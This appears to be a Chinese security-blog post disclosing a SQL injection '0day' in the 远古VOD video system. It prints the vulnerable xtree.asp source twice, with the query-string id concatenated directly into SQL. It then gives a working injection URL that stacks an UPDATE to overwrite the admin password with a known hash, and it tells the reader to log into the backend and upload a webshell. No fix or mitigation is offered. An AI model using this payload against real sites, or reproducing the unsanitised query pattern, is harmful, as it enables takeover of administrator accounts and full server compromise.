远古VOD(0day) - 网站安全 - 自学php-自学php网

远古VOD(0day) - 网站安全 - 自学php

来源：自学PHP网时间：2015-04-17 13:03 作者：阅读:次

[导读] 漏洞文件webmedia/common/function/xtree.asp〈!--#include file=../dbcon.inc.asp --〈%iNode_ID = Request.QueryString(id)if Len(Session(SuperAdmin)) 0 or Len(Session(LIVEAdmin)) ......

漏洞文件webmedia/common/function/xtree.asp
〈!--#include file="../dbcon.inc.asp" -->
〈%
iNode_ID = Request.QueryString("id")
if Len(Session("SuperAdmin")) > 0 or Len(Session("LIVEAdmin")) > 0 or Len(Session("VODAdmin")) > 0 then
szSQL = "SELECT Type_ID,ParentID,TypeName FROM TypeInfo WHERE Type_ID>=20 AND ParentID=" & iNode_ID
else
szSQL = "SELECT Type_ID,ParentID,TypeName FROM TypeInfo WHERE Type_ID>20 AND ParentID=" & iNode_ID
end if
rsData.Open szSQL,con,1,3
szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>"
do while not rsData.EOF
szRetVar = szRetVar & "<TypeInfo>"
szRetVar = szRetVar & "<IDN>" & rsData("Type_ID") & "</IDN>"
szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>"
szRetVar = szRetVar & "<TypeName>" & Replace(rsData("TypeName"), "&", "&") & "</TypeName>"
szRetVar = szRetVar & "</TypeInfo>"
rsData.MoveNext
loop
szRetVar = szRetVar & "</Root>"
rsData.Close
Response.CharSet = "GB2312"
Response.C
Response.Expires = -1
Response.Write szRetVar
%>
〈!--#include file="../dbend.inc.asp" -->
〈!--#include file="../dbcon.inc.asp" -->
〈%
iNode_ID = Request.QueryString("id")
if Len(Session("SuperAdmin")) > 0 or Len(Session("LIVEAdmin")) > 0 or Len(Session("VODAdmin")) > 0 then
szSQL = "SELECT Type_ID,ParentID,TypeName FROM TypeInfo WHERE Type_ID>=20 AND ParentID=" & iNode_ID
else
szSQL = "SELECT Type_ID,ParentID,TypeName FROM TypeInfo WHERE Type_ID>20 AND ParentID=" & iNode_ID
end if
rsData.Open szSQL,con,1,3
szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>"
do while not rsData.EOF
szRetVar = szRetVar & "<TypeInfo>"
szRetVar = szRetVar & "<IDN>" & rsData("Type_ID") & "</IDN>"
szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>"
szRetVar = szRetVar & "<TypeName>" & Replace(rsData("TypeName"), "&", "&") & "</TypeName>"
szRetVar = szRetVar & "</TypeInfo>"
rsData.MoveNext
loop
szRetVar = szRetVar & "</Root>"
rsData.Close
Response.CharSet = "GB2312"
Response.C
Response.Expires = -1
Response.Write szRetVar
%>
〈!--#include file="../dbend.inc.asp" -->
很容易看出以上存在着DB权限注入
注射地址：http://WWWW.2cto.COM /webmedia/common/function/xtree.asp?id=1
表段名：customer
构造函数把admin的pass改成fuck
http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1;update%20customer%20set%20UserPass='633f94d350db34d5'%20where%20UserName='admin'

登陆后台直接上传大马完事！

本文由( 0day5 )原创编译

简单的绕过安全狗继续注入以及一些突破思路

PHP：小心urldecode引发的SQL注入漏洞 - 网站安全

子栏目

远古VOD(0day) - 网站安全 - 自学php

最新评论

添加评论

更多文章推荐

添加评论